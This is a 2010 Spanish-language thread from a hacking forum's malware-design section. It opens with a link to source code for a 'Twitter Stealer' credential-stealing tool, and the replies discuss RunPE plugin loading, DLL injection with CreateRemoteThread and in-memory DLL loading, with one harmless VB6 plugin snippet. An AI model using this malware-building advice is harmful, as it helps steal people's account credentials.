Foro de elhacker.net

Seguridad Informática => Análisis y Diseño de Malware => Mensaje iniciado por: F3B14N en 13 Julio 2010, 19:26 pm


Título: [SRC] Twitter Stealer
Publicado por: F3B14N en 13 Julio 2010, 19:26 pm
Buenas! :D Hice esto hace mucho y lo deje por ahi, como no sirve para nada guardado en mi HD, lo publico, quizas le dé mejor utilidad alguno de ustedes =).

(http://img714.imageshack.us/img714/3111/63107613.png)
(http://img517.imageshack.us/img517/1978/14628378.png)

Como podran ver es a base de plugins, no hice ningun funcional, pero está el plugin de ejemplo, asi ven la forma en que hay q entregar los datos para que el cliente ordene todo correctamente =)

El codigo es bastante simple de entender, espero que les sirva de algo y bueno nada mas que decir, Salu2! ;)

http://www.box.net/shared/o2cod7gqjf

Título: Re: [SRC] Twitter Stealer
Publicado por: Karcrack en 13 Julio 2010, 22:52 pm
Muy completo ;)
Ahora falta ver como ejecuta plugins :rolleyes: :P
Mod:
He estado mirando por encima el codigo... y la verdad lo de los plugins no me gusta nada :-\ Eso de que para almacenar el resultado tenga que crear un fichero y que se carguen con un RunPe :-X... mucho mejor por ejemplo que los plugins fueran .DLL y que metieran la info en un Pipe o devolviesen el puntero al llamar al Main...

Saludos :D

Título: Re: [SRC] Twitter Stealer
Publicado por: F3B14N en 15 Julio 2010, 06:09 am
jaja si se puede mejorar mucho la parte de plugins, si hago v2 de esto :rolleyes: incluire el sistema de plugins del rat que creo que nunca terminare x falta de ganas :P

Lo de las DLL en VB6 no me gusta mucho por el momento, por el simple echo de la forma que son ejecutadas luego de ser inyectadas... Amaría ver un Code en VB6 que llame al DllSubMain de una libreria mediante un CallWindowProcW Remoto :P ... Pero no lo logre hacer y no veo SRC en la net como llamar un API en un proceso remoto pasandole 2 o + parametros usando CreateRemoteThread... Encontre lo mismo en c/c++ pero soy tan noobie que no logro VB6izarlo  ::) :-(

http://www.rohitab.com/discuss/index.php?showtopic=31453

Estaria muy bueno que alguien lograra escribirlo en VB6 y que lo comparta  :-X

Salu2  :D

Título: Re: [SRC] Twitter Stealer
Publicado por: Karcrack en 15 Julio 2010, 14:33 pm
Con hacer LoadLibrary a la DLL seria suficiente :P
Pero si no quieres dejarlas en el disco duro (las DLLs) tendrias que jugar con la Relocation Table como nos enseño nuestro querido amigo H0 :P

Título: Re: [SRC] Twitter Stealer
Publicado por: F3B14N en 15 Julio 2010, 17:35 pm
Cita de: Karcrack en 15 Julio 2010, 14:33 pm
Con hacer LoadLibrary a la DLL seria suficiente :P
Pero si no quieres dejarlas en el disco duro (las DLLs) tendrias que jugar con la Relocation Table como nos enseño nuestro querido amigo H0 :P

Estamos hablando de DLLs echas en VB6? Segun recuerdo de la ultima vez que intente crear una DLL en VB6 y se pueda cargar normalmente como se haria con cualquier DLL en C, etc... creo que el problema era que habia que cambiar su EntryPoint por el puntero de DllSubMain, pero al hacer eso se evadia el cargado de la MSVBVM60  :P

pd: si lo lograste hacer sin code que la ejecute, me seria muy util un ejemplo de ello  :P

Título: Re: [SRC] Twitter Stealer
Publicado por: Karcrack en 15 Julio 2010, 17:51 pm
DLLs estandar en VB6?
Código:
http://foro.elhacker.net/programacion_vb/solucionado_iquestque_es_vbadvance-t220089.0.html;msg1043501
http://foro.elhacker.net/programacion_visual_basic/inyeccion_dll-t218465.0.html

Título: Re: [SRC] Twitter Stealer
Publicado por: BlackZeroX en 19 Julio 2010, 08:03 am
Con:

createObject()

Puedes hacer lo de los plugins!¡, también hay un modulo para crear un objeto y manipular las funciones del mismo (DLL) en PSC.

Dulces Lunas!¡.

Título: Re: [SRC] Twitter Stealer
Publicado por: BlackZeroX en 19 Julio 2010, 08:19 am
Mira aquí hay un ejemplo de un DLL que puede tratarse como Plugin, ya que l forma de hacer por comunicacion de archivos de texto no va de muy grata forma xP:

http://infrangelux.sytes.net/filex/?file=/BlackZeroX/Proyectos/Proyecto%20InfraExplorer/SRC_ExamplePlugin.rar&modo=2&dir=/BlackZeroX/Proyectos/Proyecto%20InfraExplorer&

Lo que debes saber para tratar una DLL como plugin es que:

Nombre del proyecto = que el Nombre de la DLL ( si tu proyecto se llama Proyect1 tu DLL debera llamarse Proyect1.dll)
El nombre de los módulos de clase da igual, pero estos son usados para crear el Objeto con CreateObject()!¡.
Deben estar registrados con RegServ32

compila y con este código puedes correr un proceso X

El Siguiente código esta Orientado en el source qué te puse arriba ok!¡.

Código
  1.  
  2. '   by BlackZeroX.
  3. '   Antes debes generar el Plugin "PluginExplicit" y registrarlo con RegServ32 (Solo en equipos donde NO SE COMPILO!¡.)
  4.  
  5. Dim ObjPlugin as Object
  6. set ObjPlugin = createobject("PluginExplicit.cMain") ' // cMain es el nombre del Modulo de Clase!¡.
  7. with ObjPlugin
  8.     call .WSConnect ' // ejecuta el proceso deseado
  9.     msgbox .Nombre
  10.     msgbox .Version
  11.     msgbox .ProcesoUno("") ' // proceso con parámetros en este caso e sun ParamArray xP
  12.     msgbox .ProcesoDos("","","") ' // proceso con parámetros en este caso e sun ParamArray xP
  13.     msgbox .ProcesoTres("","","") ' // proceso con parámetros en este caso e sun ParamArray xP
  14.     CMain=nothing  ' // le puedes espesificar un Objeto para que el plugin trabaje con este!¡.
  15. end with
  16. set ObjPlugin = nothing ' // hay que descargarlo cuando ya no este en uso si no la memoria uff xS
  17.  
  18.  

la alternativa a CreateObject es CreateFromFile esta en PSC el modulo, y se trata de la misma manera, y hasta donde recuerdo este ultimo no nesesita que la DLL o plugin este registrado con RegServ32!¡.

Sangriento Infierno Lunar!¡.


Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines